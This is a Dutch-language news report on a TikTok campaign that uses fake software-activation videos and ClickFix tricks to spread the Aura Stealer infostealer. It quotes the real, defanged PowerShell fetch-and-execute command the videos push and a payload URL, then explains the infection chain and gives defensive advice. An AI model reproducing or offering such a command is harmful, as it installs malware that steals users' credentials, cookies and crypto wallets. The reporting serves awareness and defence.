Cybercriminelen verspreiden informatiestelende malware via een campagne op TikTok, waarbij ze video’s gebruiken die ten onrechte beweren gratis activeringsgidsen voor populaire software te zijn. De lopende operatie, geïdentificeerd op 19 oktober 2025, maakt gebruik van een social engineering-methode om gebruikers te misleiden om hun eigen computers te infecteren. ISC-handler Xavier Mertens rapporteerde de campagne en merkte overeenkomsten op met een operatie die Trend Micro in mei observeerde. De TikTok-video’s beweren instructies te bieden voor het activeren van legitieme software zoals Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro en Discord Nitro. De campagne promoot ook verzonnen diensten, waaronder ‘Netflix Premium’ en ‘Spotify Premium’, om een breder publiek te lokken. De aanvalstechniek staat bekend als een ClickFix-aanval, waarbij schijnbaar nuttige instructies worden gegeven die gebruikers ertoe verleiden kwaadaardige opdrachten uit te voeren. De video’s tonen een korte PowerShell-opdracht van één regel en instrueren kijkers om deze uit te voeren met beheerdersrechten. Een voorbeeldopdracht is iex (irm slmgr[.]win/photoshop). De specifieke programmanaam binnen de URL, zoals ‘photoshop’, wordt aangepast zodat deze overeenkomt met de software die in de video wordt nagebootst. Wanneer een gebruiker deze opdracht uitvoert, maakt PowerShell verbinding met de externe site slmgr[.]win. Met deze actie wordt een tweede PowerShell-script opgehaald en uitgevoerd, dat vervolgens twee uitvoerbare bestanden van Cloudflare-pagina’s downloadt. Het eerste bestand, gedownload van https://file-epq[.]pages[.]dev/updater.exeis een variant van de Aura Stealer-malware. Aura Stealer is ontworpen om opgeslagen inloggegevens van webbrowsers, authenticatiecookies, cryptocurrency-portefeuilles en inloggegevens van andere applicaties te verzamelen. Deze gestolen informatie wordt vervolgens geüpload naar de aanvallers, waardoor ze toegang krijgen tot de accounts van het slachtoffer. Een tweede lading, genaamd source.exewordt ook gedownload. Dit uitvoerbare bestand wordt gebruikt om zelf code te compileren met behulp van de ingebouwde Visual C# Compiler van het .NET-framework (csc.exe). De gecompileerde code wordt vervolgens rechtstreeks in het geheugen geïnjecteerd en gelanceerd. Het specifieke doel van deze tweede lading is nog niet vastgesteld. Gebruikers die de instructies in deze video’s hebben gevolgd, moeten er rekening mee houden dat al hun inloggegevens zijn aangetast en wordt geadviseerd om de wachtwoorden voor alle websites en online services die ze gebruiken onmiddellijk opnieuw in te stellen. ClickFix-aanvallen zijn het afgelopen jaar aanzienlijk gebruikelijker geworden. Ze worden gebruikt om verschillende soorten malware te verspreiden in campagnes die verband houden met ransomware en diefstal van cryptocurrency. Als algemene beveiligingspraktijk mogen gebruikers nooit tekst van een website kopiëren en deze uitvoeren in een dialoogvenster van het besturingssysteem, inclusief de adresbalk van de Verkenner, opdrachtprompt, PowerShell, macOS-terminal of Linux-shells.
Source: TikTok-video’s verspreiden Aura Stealer via valse softwaregidsen
